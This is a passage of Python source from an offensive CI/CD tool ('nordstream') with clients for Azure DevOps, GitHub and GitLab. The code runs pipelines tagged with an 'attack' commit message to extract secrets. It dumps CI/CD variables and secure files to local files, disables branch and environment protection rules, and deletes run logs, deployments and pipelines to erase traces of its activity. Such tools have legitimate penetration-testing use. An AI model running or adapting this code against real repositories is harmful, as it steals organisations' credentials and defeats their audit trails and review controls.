logger.info(f"Queue found : {queue_name} (Queue ID: {queue_id}, Pool ID: {queue['pool']['id']})")
break
if not queue_id:
logger.error(f"Queue {self._defaultAgentPool} not found for default agent pool, or not accessible by the project. Not updating")
return pipeline_id
# Update pipeline Default agent with specified queue, via the definitions API
update_url = f"{self._baseURL}/{project}/_apis/build/definitions/{pipeline_id}"
response = self._session.get(update_url)
definition = response.json()
# Add default pool agent with queue
definition['queue'] = {
'id': queue_id,
'name': queue_name
}
response = self._session.put(update_url, json=definition)
return pipeline_id
def runPipeline(self, project, pipelineId):
logger.debug(f"Running pipeline: {pipelineId}")
params = {
"definition": {"id": pipelineId},
"sourceBranch": f"refs/heads/{self._branchName}",
}
response = self._session.post(
f"{self._baseURL}/{project}/_apis/build/Builds",
json=params,
).json()
return response
def __getBuilds(self, project):
logger.debug(f"Getting builds.")
return (
self._session.get(
f"{self._baseURL}/{project}/_apis/build/Builds",
)
.json()
.get("value")
)
def __getBuildSources(self, project, buildId):
return self._session.get(
f"{self._baseURL}/{project}/_apis/build/Builds/{buildId}/sources",
).json()
def getRunId(self, project, pipelineId):
logger.debug(f"Getting RunId for pipeline: {pipelineId}")
for i in range(self._maxRetry):
# Don't wait first time
if i != 0:
logger.warning(f"Run not available, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
for build in self.__getBuilds(project):
if build.get("definition").get("id") == pipelineId:
buildId = build.get("id")
buildSource = self.__getBuildSources(project, buildId)
if (
buildSource.get("comment") == Git.ATTACK_COMMIT_MSG
and buildSource.get("author").get("email") == Git.EMAIL
):
return buildId
if i == (self._maxRetry - 1):
logger.error("Error: run still not ready.")
return None
def waitPipeline(self, project, pipelineId, runId):
logger.info("Getting pipeline output")
for i in range(self._maxRetry):
if i != 0:
logger.warning(f"Pipeline still running, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
response = self._session.get(
f"{self._baseURL}/{project}/_apis/pipelines/{pipelineId}/runs/{runId}",
json={},
).json()
if response.get("state") == "completed":
return response.get("result")
if i == (self._maxRetry - 1):
logger.error("Error: pipeline still not finished.")
return None
def __createPipelineOutputDir(self, projectName):
makedirs(f"{self._outputDir}/{self._org}/{projectName}", exist_ok=True)
def downloadPipelineOutput(self, projectId, runId):
self.__createPipelineOutputDir(projectId)
for i in range(self._maxRetry):
if i != 0:
logger.warning(f"Output not ready, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
buildTimeline = self._session.get(
f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}/timeline",
json={},
).json()
logs = [
record["log"]["id"]
for record in buildTimeline["records"]
if record["name"] == DevOpsPipelineGenerator.taskName
]
if len(logs) != 0:
break
# if there are logs but we didn't find the taskName, get the last
# job as it contains all the data
if len(buildTimeline["records"]) > 0:
logs = [buildTimeline["records"][-1]["log"]["id"]]
break
if i == (self._maxRetry - 1):
logger.error("Output still not ready, error!")
return None
logId = logs[0]
logger.debug(f"Log ID of the extraction task: {logId}")
for i in range(self._maxRetry):
if i != 0:
logger.warning(f"Output not ready, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
logOutput = self._session.get(
f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}/logs/{logId}",
json={},
).json()
if len(logOutput.get("value")) != 0:
break
if i == (self._maxRetry - 1):
logger.error("Output still not ready, error!")
return None
date = time.strftime("%Y-%m-%d_%H-%M-%S")
with open(f"{self._outputDir}/{self._org}/{projectId}/pipeline_{date}.log", "w") as f:
for line in logOutput.get("value"):
f.write(line + "\n")
f.close()
return f"pipeline_{date}.log"
def __cleanRunLogs(self, projectId):
logger.verbose("Cleaning run logs.")
builds = self.__getBuilds(projectId)
if len(builds) != 0:
for build in builds:
buildId = build.get("id")
buildSource = self.__getBuildSources(projectId, buildId)
if (
buildSource.get("comment") in [Git.ATTACK_COMMIT_MSG, Git.CLEAN_COMMIT_MSG]
and buildSource.get("author").get("email") == Git.EMAIL
):
self._session.delete(
f"{self._baseURL}/{projectId}/_apis/build/builds/{buildId}",
)
def __cleanPipeline(self, projectId):
logger.verbose(f"Removing pipeline.")
response = self._session.get(
f"{self._baseURL}/{projectId}/_apis/pipelines",
).json()
if response.get("count", 0) != 0:
for pipeline in response.get("value"):
if pipeline.get("name") == self._pipelineName:
pipelineId = pipeline.get("id")
self._session.delete(
f"{self._baseURL}/{projectId}/_apis/pipelines/{pipelineId}",
)
def deletePipeline(self, projectId):
logger.debug("Deleting pipeline")
response = self._session.get(
f"{self._baseURL}/{projectId}/_apis/build/Definitions",
json={},
).json()
if response.get("count", 0) != 0:
for pipeline in response.get("value"):
if pipeline.get("name") == self._pipelineName:
definitionId = pipeline.get("id")
self._session.delete(
f"{self._baseURL}/{projectId}/_apis/build/definitions/{definitionId}",
json={},
)
def cleanAllLogs(self, projectId):
self.__cleanRunLogs(projectId)
def listServiceConnections(self, projectId):
logger.debug("Listing service connections")
res = []
response = self._session.get(
f"{self._baseURL}/{projectId}/_apis/serviceendpoint/endpoints",
json={},
)
if response.status_code != 200:
raise DevOpsError("Can't list service connections.")
response = response.json()
if response.get("count", 0) != 0:
res = response.get("value")
return res
def getFailureReason(self, projectId, runId):
res = []
response = self._session.get(
f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}",
).json()
for result in response.get("validationResults"):
res.append(result.get("message"))
try:
timeline = self._session.get(
f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}/Timeline",
).json()
for record in timeline.get("records", []):
if record.get("issues"):
for issue in record.get("issues"):
res.append(issue.get("message"))
except:
pass
return res
@classmethod
def getOrgs(cls, token):
logger.verbose(f"Listing orgs")
if isAZDOBearerToken(token):
# https://github.com/zolderio/devops/blob/main/get_profile_org_repos.py
url = "https://app.vssps.visualstudio.com/_apis/profile/profiles/me?api-version=7.1"
# Headers with authentication and content type
headers = {
'Authorization': f'Bearer {token}',
'Content-Type': 'application/json'
}
response = requests.get(url, headers=headers)
# Check if request was successful
response.raise_for_status()
# Parse and print the JSON response
data = response.json()
# Get organizations URL from profile response
orgs_url = "https://app.vssps.visualstudio.com/_apis/accounts?memberId={}&api-version=7.1".format(data['id'])
# Get organizations
orgs_response = requests.get(orgs_url, headers=headers)
orgs_response.raise_for_status()
return orgs_response.json()
else:
raise DevOpsError("Only access token can be used for this operation.")
================================================
FILE: nordstream/cicd/github.py
================================================
import requests
import time
from os import makedirs
import urllib.parse
from nordstream.utils.errors import GitHubError, GitHubBadCredentials
from nordstream.utils.log import logger
from nordstream.git import Git
from nordstream.utils.constants import *
class GitHub:
_DEFAULT_BRANCH_NAME = DEFAULT_BRANCH_NAME
_token = None
_auth = None
_org = None
_githubLogin = None
_repos = []
_header = {
"Accept": "application/vnd.github+json",
"User-Agent": USER_AGENT,
}
_repoURL = "https://api.github.com/repos"
_session = None
_branchName = _DEFAULT_BRANCH_NAME
_outputDir = OUTPUT_DIR
_sleepTime = 15
_maxRetry = 10
_isGHSToken = False
def __init__(self, token):
self._token = token
self._auth = ("foo", self._token)
self._session = requests.Session()
if token.lower().startswith("ghs_"):
self._isGHSToken = True
self._githubLogin = self.__getLogin()
@staticmethod
def checkToken(token):
logger.verbose(f"Checking token: {token}")
headers = GitHub._header
headers["Authorization"] = f"token {token}"
data = {"query": "query UserCurrent{viewer{login}}"}
return requests.post("https://api.github.com/graphql", headers=headers, json=data).status_code == 200
@property
def token(self):
return self._token
@property
def org(self):
return self._org
@org.setter
def org(self, org):
self._org = org
@property
def defaultBranchName(self):
return self._DEFAULT_BRANCH_NAME
@property
def branchName(self):
return self._branchName
@branchName.setter
def branchName(self, value):
self._branchName = value
@property
def repos(self):
return self._repos
@property
def outputDir(self):
return self._outputDir
@outputDir.setter
def outputDir(self, value):
self._outputDir = value
def __getLogin(self):
return self.getLoginWithGraphQL().json().get("data").get("viewer").get("login")
def getUser(self):
logger.debug("Retrieving user information")
return self._session.get(f"https://api.github.com/user", auth=self._auth, headers=self._header)
def getLoginWithGraphQL(self):
logger.debug("Retrieving identity with GraphQL")
headers = self._header
headers["Authorization"] = f"token {self._token}"
data = {"query": "query UserCurrent{viewer{login}}"}
return self._session.post("https://api.github.com/graphql", headers=headers, json=data)
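# Aggregate paginated results from the GitHub REST API: increase the page parameter until an empty page,
# an API error or the optional maxData limit is reached.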
def __paginatedGet(self, url, data="", maxData=0):
page = 1
res = []
while True:
params = {"page": page}
response = self._session.get(
url,
params=params,
auth=self._auth,
headers=self._header,
).json()
if not isinstance(response, list) and response.get("message", None):
if response.get("message") == "Bad credentials":
raise GitHubBadCredentials(response.get("message"))
elif response.get("message") != "Not Found":
raise GitHubError(response.get("message"))
return res
if (data != "" and len(response.get(data)) == 0) or (data == "" and len(response) == 0):
break
if data != "" and len(response.get(data)) != 0:
res.extend(response.get(data, []))
if data == "" and len(response) != 0:
res.extend(response)
if maxData != 0 and len(res) >= maxData:
break
page += 1
return res
def listRepos(self):
logger.debug("Listing repos")
if self._isGHSToken:
url = f"https://api.github.com/orgs/{self._org}/repos"
else:
url = f"https://api.github.com/user/repos"
response = self.__paginatedGet(url)
for repo in response:
# filter for specific org
if self._org:
if self._org.lower() == repo.get("owner").get("login").lower():
self._repos.append(repo.get("full_name"))
else:
self._repos.append(repo.get("full_name"))
def addRepo(self, repo):
logger.debug(f"Checking repo: {repo}")
if self._org:
full_name = self._org + "/" + repo
else:
# if no org, must provide repo as 'org/repo'
# FIXME: This cannot happen at the moment because --org argument is required
if len(repo.split("/")) == 2:
full_name = repo
else:
# FIXME: Raise an Exception here
logger.error(f"Invalid repo name: {repo}")
response = self._session.get(
f"{self._repoURL}/{full_name}",
auth=self._auth,
headers=self._header,
).json()
if response.get("message", None) and response.get("message") == "Bad credentials":
raise GitHubBadCredentials(response.get("message"))
if response.get("id"):
self._repos.append(response.get("full_name"))
def listEnvFromrepo(self, repo):
logger.debug(f"Listing environment secret from repo: {repo}")
res = []
response = self.__paginatedGet(f"{self._repoURL}/{repo}/environments", data="environments")
for env in response:
res.append(env.get("name"))
return res
def listSecretsFromEnv(self, repo, env):
logger.debug(f"Getting environment secrets for {repo}: {env}")
envReq = urllib.parse.quote(env, safe="")
res = []
response = self.__paginatedGet(f"{self._repoURL}/{repo}/environments/{envReq}/secrets", data="secrets")
for sec in response:
res.append(sec.get("name"))
return res
def listSecretsFromRepo(self, repo):
res = []
response = self.__paginatedGet(f"{self._repoURL}/{repo}/actions/secrets", data="secrets")
for sec in response:
res.append(sec.get("name"))
return res
def listOrganizationSecretsFromRepo(self, repo):
res = []
response = self.__paginatedGet(f"{self._repoURL}/{repo}/actions/organization-secrets", data="secrets")
for sec in response:
res.append(sec.get("name"))
return res
def listDependabotSecretsFromRepo(self, repo):
res = []
response = self.__paginatedGet(f"{self._repoURL}/{repo}/dependabot/secrets", data="secrets")
for sec in response:
res.append(sec.get("name"))
return res
def listDependabotOrganizationSecrets(self):
res = []
response = self.__paginatedGet(f"https://api.github.com/orgs/{self._org}/dependabot/secrets", data="secrets")
for sec in response:
res.append(sec.get("name"))
return res
def listEnvProtections(self, repo, env):
logger.debug("Getting environment protections")
envReq = urllib.parse.quote(env, safe="")
res = []
response = self._session.get(
f"{self._repoURL}/{repo}/environments/{envReq}",
auth=self._auth,
headers=self._header,
).json()
for protection in response.get("protection_rules"):
protectionType = protection.get("type")
res.append(protectionType)
return res
def getEnvDetails(self, repo, env):
envReq = urllib.parse.quote(env, safe="")
response = self._session.get(
f"{self._repoURL}/{repo}/environments/{envReq}",
auth=self._auth,
headers=self._header,
).json()
if response.get("message"):
raise GitHubError(response.get("message"))
return response
def createDeploymentBranchPolicy(self, repo, env):
envReq = urllib.parse.quote(env, safe="")
logger.debug(f"Adding new branch policy for {self._branchName} on {envReq}")
data = {"name": f"{self._branchName}"}
response = self._session.post(
f"{self._repoURL}/{repo}/environments/{envReq}/deployment-branch-policies",
json=data,
auth=self._auth,
headers=self._header,
).json()
if response.get("message"):
raise GitHubError(response.get("message"))
policyId = response.get("id")
logger.debug(f"Branch policy id: {policyId}")
return policyId
def deleteDeploymentBranchPolicy(self, repo, env):
logger.debug("Delete deployment branch policy")
envReq = urllib.parse.quote(env, safe="")
response = self._session.get(
f"{self._repoURL}/{repo}/environments/{envReq}",
auth=self._auth,
headers=self._header,
).json()
if response.get("deployment_branch_policy") is not None:
response = self._session.get(
f"{self._repoURL}/{repo}/environments/{envReq}/deployment-branch-policies",
auth=self._auth,
headers=self._header,
).json()
for policy in response.get("branch_policies"):
if policy.get("name").lower() == self._branchName.lower():
logger.verbose(f"Deleting branch policy for {self._branchName} on {envReq}")
policyId = policy.get("id")
self._session.delete(
f"{self._repoURL}/{repo}/environments/{envReq}/deployment-branch-policies/{policyId}",
auth=self._auth,
headers=self._header,
)
def disableBranchProtectionRules(self, repo):
logger.debug("Modifying branch protection")
response = self._session.get(
f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}",
auth=self._auth,
headers=self._header,
).json()
if response.get("name") and response.get("protected"):
data = {
"required_status_checks": None,
"enforce_admins": False,
"required_pull_request_reviews": None,
"restrictions": None,
"allow_deletions": True,
"allow_force_pushes": True,
}
self._session.put(
f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}/protection",
json=data,
auth=self._auth,
headers=self._header,
)
def modifyEnvProtectionRules(self, repo, env, wait, reviewers, branchPolicy):
data = {
"wait_timer": wait,
"reviewers": reviewers,
"deployment_branch_policy": branchPolicy,
}
envReq = urllib.parse.quote(env, safe="")
response = self._session.put(
f"{self._repoURL}/{repo}/environments/{envReq}",
json=data,
auth=self._auth,
headers=self._header,
).json()
if response.get("message"):
raise GitHubError(response.get("message"))
return response
def deleteDeploymentBranchPolicyForAllEnv(self, repo):
allEnv = self.listEnvFromrepo(repo)
for env in allEnv:
self.deleteDeploymentBranchPolicy(repo, env)
def checkBranchProtectionRules(self, repo):
response = self._session.get(
f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}",
auth=self._auth,
headers=self._header,
).json()
if response.get("message"):
raise GitHubError(response.get("message"))
return response.get("protected")
def getBranchesProtectionRules(self, repo):
logger.debug("Getting branch protection rules")
response = self._session.get(
f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}/protection",
auth=self._auth,
headers=self._header,
).json()
if response.get("message"):
return None
return response
def updateBranchesProtectionRules(self, repo, protections):
logger.debug("Updating branch protection rules")
response = self._session.put(
f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}/protection",
auth=self._auth,
headers=self._header,
json=protections,
).json()
return response
def cleanDeploymentsLogs(self, repo):
logger.verbose(f"Cleaning deployment logs from: {repo}")
url = f"{self._repoURL}/{repo}/deployments?ref={urllib.parse.quote(self._branchName)}"
response = self.__paginatedGet(url, maxData=200)
for deployment in response:
if not self._isGHSToken and deployment.get("creator").get("login").lower() != self._githubLogin.lower():
continue
commit = self._session.get(
f"{self._repoURL}/{repo}/commits/{deployment['sha']}", auth=self._auth, headers=self._header
).json()
# We want to delete only our action so we must filter some attributes
if commit["commit"]["message"] not in [Git.ATTACK_COMMIT_MSG, Git.CLEAN_COMMIT_MSG]:
continue
if commit["commit"]["committer"]["name"] != Git.USER:
continue
if commit["commit"]["committer"]["email"] != Git.EMAIL:
continue
deploymentId = deployment.get("id")
data = {"state": "inactive"}
self._session.post(
f"{self._repoURL}/{repo}/deployments/{deploymentId}/statuses",
json=data,
auth=self._auth,
headers=self._header,
)
self._session.delete(
f"{self._repoURL}/{repo}/deployments/{deploymentId}",
auth=self._auth,
headers=self._header,
)
def cleanRunLogs(self, repo, workflowFilename):
logger.verbose(f"Cleaning run logs from: {repo}")
url = f"{self._repoURL}/{repo}/actions/runs?branch={urllib.parse.quote(self._branchName)}"
if not self._isGHSToken:
url += f"&actor={self._githubLogin.lower()}"
# we don't scan all the logs, we only check the last 200
response = self.__paginatedGet(url, data="workflow_runs", maxData=200)
for run in response:
# skip if it's not our commit
if run.get("head_commit").get("message") not in [Git.ATTACK_COMMIT_MSG, Git.CLEAN_COMMIT_MSG]:
continue
committer = run.get("head_commit").get("committer")
if committer.get("name") != Git.USER:
continue
if committer.get("email") != Git.EMAIL:
continue
runId = run.get("id")
status = (
self._session.get(
f"{self._repoURL}/{repo}/actions/runs/{runId}",
json={},
auth=self._auth,
headers=self._header,
)
.json()
.get("status")
)
if status != "completed":
self._session.post(
f"{self._repoURL}/{repo}/actions/runs/{runId}/cancel",
json={},
auth=self._auth,
headers=self._header,
)
status = (
self._session.get(
f"{self._repoURL}/{repo}/actions/runs/{runId}",
json={},
auth=self._auth,
headers=self._header,
)
.json()
.get("status")
)
if status != "completed":
for i in range(self._maxRetry):
time.sleep(2)
status = (
self._session.get(
f"{self._repoURL}/{repo}/actions/runs/{runId}",
json={},
auth=self._auth,
headers=self._header,
)
.json()
.get("status")
)
if status == "completed":
break
self._session.delete(
f"{self._repoURL}/{repo}/actions/runs/{runId}/logs",
auth=self._auth,
headers=self._header,
)
self._session.delete(
f"{self._repoURL}/{repo}/actions/runs/{runId}",
auth=self._auth,
headers=self._header,
)
def cleanAllLogs(self, repo, workflowFilename):
logger.debug(f"Cleaning logs for: {repo}")
self.cleanRunLogs(repo, workflowFilename)
self.cleanDeploymentsLogs(repo)
def createWorkflowOutputDir(self, repo):
outputName = repo.split("/")
makedirs(f"{self._outputDir}/{outputName[0]}/{outputName[1]}", exist_ok=True)
def waitWorkflow(self, repo, workflowFilename):
logger.info("Getting workflow output")
time.sleep(5)
workflowFilename = urllib.parse.quote_plus(workflowFilename)
response = self._session.get(
f"{self._repoURL}/{repo}/actions/workflows/{workflowFilename}/runs?branch={urllib.parse.quote(self._branchName)}",
auth=self._auth,
headers=self._header,
).json()
if response.get("total_count", 0) == 0:
for i in range(self._maxRetry):
logger.warning(f"Workflow not started, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
response = self._session.get(
f"{self._repoURL}/{repo}/actions/workflows/{workflowFilename}/runs?branch={urllib.parse.quote(self._branchName)}",
auth=self._auth,
headers=self._header,
).json()
if response.get("total_count", 0) != 0:
break
if i == (self._maxRetry - 1):
logger.error("Error: workflow still not started.")
return None, None
if response.get("workflow_runs")[0].get("status") != "completed":
for i in range(self._maxRetry):
logger.warning(f"Workflow not finished, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
response = self._session.get(
f"{self._repoURL}/{repo}/actions/workflows/{workflowFilename}/runs?branch={urllib.parse.quote(self._branchName)}",
auth=self._auth,
headers=self._header,
).json()
if response.get("workflow_runs")[0].get("status") == "completed":
break
if i == (self._maxRetry - 1):
logger.error("Error: workflow still not finished.")
return (
response.get("workflow_runs")[0].get("id"),
response.get("workflow_runs")[0].get("conclusion"),
)
def downloadWorkflowOutput(self, repo, name, workflowId):
self.createWorkflowOutputDir(repo)
zipFile = self._session.get(
f"{self._repoURL}/{repo}/actions/runs/{workflowId}/logs",
auth=self._auth,
headers=self._header,
)
date = time.strftime("%Y-%m-%d_%H-%M-%S")
with open(f"{self._outputDir}/{repo}/workflow_{name}_{date}.zip", "wb") as f:
f.write(zipFile.content)
f.close()
return f"workflow_{name}_{date}.zip"
def getFailureReason(self, repo, workflowId):
res = []
workflow = self._session.get(
f"{self._repoURL}/{repo}/actions/runs/{workflowId}",
auth=self._auth,
headers=self._header,
).json()
checkSuiteId = workflow.get("check_suite_id")
checkRuns = self._session.get(
f"{self._repoURL}/{repo}/check-suites/{checkSuiteId}/check-runs",
auth=self._auth,
headers=self._header,
).json()
if checkRuns.get("total_count"):
for checkRun in checkRuns.get("check_runs"):
checkRunId = checkRun.get("id")
annotations = self._session.get(
f"{self._repoURL}/{repo}/check-runs/{checkRunId}/annotations",
auth=self._auth,
headers=self._header,
).json()
for annotation in annotations:
res.append(annotation.get("message"))
return res
def filterWriteRepos(self):
res = []
for repo in self._repos:
try:
self.listSecretsFromRepo(repo)
res.append(repo)
except GitHubError:
pass
self._repos = res
def isGHSToken(self):
return self._isGHSToken
================================================
FILE: nordstream/cicd/gitlab.py
================================================
import requests
import time
import re
import sys
from os import makedirs
from nordstream.utils.log import logger
from nordstream.utils.errors import GitLabError
from nordstream.git import Git
from nordstream.utils.constants import *
from nordstream.utils.helpers import isGitLabSessionCookie
# painful warnings you know what you are doing right ?
requests.packages.urllib3.disable_warnings()
class GitLab:
_DEFAULT_BRANCH_NAME = DEFAULT_BRANCH_NAME
_auth = None
_session = None
_token = None
_projects = []
_groups = []
_outputDir = OUTPUT_DIR
_headers = {
"User-Agent": USER_AGENT,
}
_cookies = {}
_gitlabURL = None
_branchName = _DEFAULT_BRANCH_NAME
_sleepTime = 15
_maxRetry = 10
def __init__(self, url, token, verifCert):
self._gitlabURL = url.strip("/")
self._token = token
self._session = requests.Session()
self._session.verify = verifCert
self.setCookiesAndHeaders()
self._gitlabLogin = self.__getLogin()
@property
def projects(self):
return self._projects
@property
def groups(self):
return self._groups
@property
def token(self):
return self._token
@property
def url(self):
return self._gitlabURL
@property
def outputDir(self):
return self._outputDir
@outputDir.setter
def outputDir(self, value):
self._outputDir = value
@property
def defaultBranchName(self):
return self._DEFAULT_BRANCH_NAME
@property
def branchName(self):
return self._branchName
@branchName.setter
def branchName(self, value):
self._branchName = value
@classmethod
def checkToken(cls, token, gitlabURL, verifyCert):
logger.verbose(f"Checking token: {token}")
# from https://docs.gitlab.com/ee/api/rest/index.html#personalprojectgroup-access-tokens
try:
cookies = {}
headers = GitLab._headers
if isGitLabSessionCookie(token):
cookies["_gitlab_session"] = token
else:
headers["PRIVATE-TOKEN"] = token
return (
requests.get(
f"{gitlabURL.strip('/')}/api/v4/user",
headers=headers,
cookies=cookies,
verify=verifyCert,
).status_code
== 200
)
except requests.exceptions.RequestException as e:
logger.error(e)
sys.exit(1)
return False
def __getLogin(self):
response = self.getUser()
return response.get("username", "")
def getUser(self):
logger.debug(f"Retrieving user information")
return self._session.get(f"{self._gitlabURL}/api/v4/user").json()
def setCookiesAndHeaders(self):
if isGitLabSessionCookie(self._token):
self._session.cookies.update({"_gitlab_session": self._token})
else:
self._session.headers.update({"PRIVATE-TOKEN": self._token})
self._session.headers.update(self._headers)
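# Aggregate paginated results from the GitLab REST API (100 items per page) until an empty page or a non-200 status code.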
def __paginatedGet(self, url, params={}):
params["per_page"] = 100
res = []
i = 1
while True:
params["page"] = i
logger.debug(f"Paginated GET request to {url} with parameters {params}")
response = self._session.get(url, params=params)
if response.status_code == 200:
if len(response.json()) == 0:
break
res.extend(response.json())
i += 1
else:
logger.debug(f"Error {response.status_code} while retrieving data: {url}")
return response.status_code, response.json()
return response.status_code, res
def listRunnersFromProject(self, project):
id = project.get("id")
res = []
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects/{id}/jobs")
if status_code == 200 and len(response) > 0:
for job in response:
if not job.get("runner") or not job.get("runner_manager"):
continue
# Get executor from job trace
executor = "unknown"
response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{id}/jobs/{job['id']}/trace")
if response.status_code == 200 and len(response.text) > 0:
regex = r'Preparing the "([^"]+)" executor'
match = re.search(regex, response.text)
if match:
executor = match.group(1)
_runner = job["runner"]
_manager = job["runner_manager"]
res.append(
{
"id": f"{_runner['id']}/{_manager['system_id']}",
"status": _manager["status"],
"contacted_at": _manager["contacted_at"],
"runner_type": _runner["runner_type"],
"access_level": "unknown",
"executor": executor,
"description": _runner["description"],
"platform": _manager["platform"],
"architecture": _manager["architecture"],
"ip_address": _manager["ip_address"],
"version": _manager["version"],
"projects": [project["path_with_namespace"]],
"tags": job["tag_list"],
}
)
elif status_code == 403:
raise GitLabError(response.get("message"))
return res
def listVariablesFromProject(self, project):
id = project.get("id")
res = []
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects/{id}/variables")
if status_code == 200 and len(response) > 0:
path = self.__createOutputDir(project.get("path_with_namespace"))
f = open(f"{path}/secrets.txt", "w")
for variable in response:
secret = {"key": variable["key"], "value": variable["value"], "protected": variable["protected"]}
if variable.get("hidden") is not None:
secret["hidden"] = variable["hidden"]
else:
secret["hidden"] = "N/A"
res.append(secret)
f.write(f"{variable['key']}={variable['value']}\n")
f.close()
elif status_code == 403:
raise GitLabError(response.get("message"))
return res
def listInheritedVariablesFromProject(self, project):
id = project.get("id")
res = []
graphQL = {
"operationName": "getInheritedCiVariables",
"variables": {"first": 100, "fullPath": project.get("path_with_namespace")},
"query": """
query getInheritedCiVariables($after: String, $first: Int, $fullPath: ID!) {
project(fullPath: $fullPath) {
inheritedCiVariables(after: $after, first: $first) {
nodes {
key
groupName
masked
hidden
protected
raw
}
}
}
}
""",
}
response = self._session.post(f"{self._gitlabURL}/api/graphql", json=graphQL)
if response.status_code == 200 and len(response.text) > 0:
if response.json().get("data", {}).get("project", {}) is None:
return res
path = self.__createOutputDir(project.get("path_with_namespace"))
f = open(f"{path}/secrets.txt", "a")
nodes = response.json().get("data", {}).get("project", {}).get("inheritedCiVariables", {}).get("nodes", [])
for variable in nodes:
secret = {
"key": variable["key"],
"value": variable["raw"],
"group": variable["groupName"],
"protected": variable["protected"],
}
if variable.get("hidden") is not None:
secret["hidden"] = variable["hidden"]
else:
secret["hidden"] = "N/A"
res.append(secret)
f.write(f"{variable['key']}={variable['raw']}\n")
f.close()
elif response.status_code == 403:
raise GitLabError(response.get("message"))
return res
def listSecureFilesFromProject(self, project):
logger.debug("Getting project secure files")
id = project.get("id")
res = []
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects/{id}/secure_files")
if status_code == 200 and len(response) > 0:
path = self.__createOutputDir(project.get("path_with_namespace"))
date = time.strftime("%Y-%m-%d_%H-%M-%S")
for secFile in response:
date = time.strftime("%Y-%m-%d_%H-%M-%S")
name = "".join(
[c for c in secFile.get("name") if c.isalpha() or c.isdigit() or c in (" ", ".", "-", "_")]
).strip()
fileName = f"securefile_{date}_{name}"
f = open(f"{path}/{fileName}", "wb")
content = self._session.get(
f"{self._gitlabURL}/api/v4/projects/{id}/secure_files/{secFile.get('id')}/download"
)
# handle large files
for chunk in content.iter_content(chunk_size=8192):
f.write(chunk)
f.close()
res.append({"name": secFile.get("name"), "path": f"{path}/{fileName}"})
elif status_code == 403:
raise GitLabError(response.get("message"))
return res
def listVariablesFromGroup(self, group):
id = group.get("id")
res = []
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/groups/{id}/variables")
if status_code == 200 and len(response) > 0:
path = self.__createOutputDir(group.get("full_path"))
f = open(f"{path}/secrets.txt", "w")
for variable in response:
secret = {"key": variable["key"], "value": variable["value"], "protected": variable["protected"]}
if variable.get("hidden") is not None:
secret["hidden"] = variable["hidden"]
else:
secret["hidden"] = "N/A"
res.append(secret)
f.write(f"{variable['key']}={variable['value']}\n")
f.close()
elif status_code == 403:
raise GitLabError(response.get("message"))
return res
def listVariablesFromInstance(self):
res = []
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/admin/ci/variables")
if status_code == 200 and len(response) > 0:
path = self.__createOutputDir("")
f = open(f"{path}/secrets.txt", "w")
for variable in response:
secret = {"key": variable["key"], "value": variable["value"], "protected": variable["protected"]}
if variable.get("hidden") is not None:
secret["hidden"] = variable["hidden"]
else:
secret["hidden"] = "N/A"
res.append(secret)
f.write(f"{variable['key']}={variable['value']}\n")
f.close()
elif status_code == 403:
raise GitLabError(response.get("message"))
return res
def addProjects(self, project=None, filterWrite=False, strict=False, membership=False):
params = {}
if membership:
params["membership"] = True
if project != None:
params["search_namespaces"] = True
params["search"] = project
if filterWrite:
params["min_access_level"] = 30
if not (project and project.isnumeric()):
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects", params)
else:
response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{project}")
status_code = response.status_code
response = [response.json()]
if status_code == 200:
if len(response) == 0:
return
for p in response:
if strict and p.get("path_with_namespace") != project:
continue
p = {
"id": p.get("id"),
"path_with_namespace": p.get("path_with_namespace"),
"name": p.get("name"),
"path": p.get("path"),
}
self._projects.append(p)
else:
logger.error(f"Error while retrieving {f'project: {project}' if project is not None else 'projects'}")
logger.debug(response)
def addGroups(self, group=None):
params = {"all_available": True}
if group != None:
params["search_namespaces"] = True
params["search"] = group
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/groups", params)
if status_code == 200:
if len(response) == 0:
return
for p in response:
p = {
"id": p.get("id"),
"full_path": p.get("full_path"),
"name": p.get("name"),
}
self._groups.append(p)
else:
logger.error("Error while retrieving groups")
logger.debug(response)
def listUsers(self):
logger.debug(f"Listing users.")
res = []
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/users")
if status_code == 200:
if len(response) == 0:
return
for p in response:
u = {
"id": p.get("id"),
"username": p.get("username"),
"email": p.get("email"),
"is_admin": p.get("is_admin"),
}
res.append(u)
else:
logger.error("Error while retrieving users")
logger.debug(response)
return res
def __createOutputDir(self, name):
# outputName = name.replace("/", "_")
path = f"{self._outputDir}/{name}"
makedirs(path, exist_ok=True)
return path
def waitPipeline(self, projectId):
logger.info("Getting pipeline output")
time.sleep(5)
response = self._session.get(
f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines?ref={self._branchName}&username={self._gitlabLogin}"
).json()
if response[0].get("status") not in COMPLETED_STATES:
for i in range(self._maxRetry):
logger.warning(f"Pipeline still running, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
response = self._session.get(
f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines?ref={self._branchName}&username={self._gitlabLogin}"
).json()
if response[0].get("status") in COMPLETED_STATES:
break
if i == (self._maxRetry - 1):
logger.error("Error: pipeline still not finished.")
return (
response[0].get("id"),
response[0].get("status"),
)
def __getJobs(self, projectId, pipelineId):
status_code, response = self.__paginatedGet(
